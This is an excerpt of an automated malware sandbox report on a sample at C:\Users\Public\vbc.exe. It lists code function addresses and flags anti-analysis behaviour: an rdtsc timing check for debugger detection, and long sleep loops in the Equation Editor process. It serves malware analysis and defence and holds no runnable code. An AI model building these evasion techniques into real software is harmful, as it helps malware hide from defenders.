Source: C:\Users\Public\vbc.exe Code function: 6_2_002F207C 6_2_002F207C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F7CB7 6_2_002F7CB7
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F40EF 6_2_002F40EF
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F04C0 6_2_002F04C0
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F293F 6_2_002F293F
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F2567 6_2_002F2567
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F6D5C 6_2_002F6D5C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F21DB 6_2_002F21DB
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F05D8 6_2_002F05D8
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F0626 6_2_002F0626
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F8605 6_2_002F8605
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F7EB4 6_2_002F7EB4
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F3EB2 6_2_002F3EB2
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F06E2 6_2_002F06E2
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F06D2 6_2_002F06D2
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F4345 6_2_002F4345
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F8B51 6_2_002F8B51
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F3FA8 6_2_002F3FA8
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F37A5 6_2_002F37A5
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F3FE9 6_2_002F3FE9
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F3FC2 6_2_002F3FC2
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_002F2407 rdtsc 6_2_002F2407
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1952 Thread sleep time: -180000s >= -30000s Jump to behavior

Anti Debugging:

bar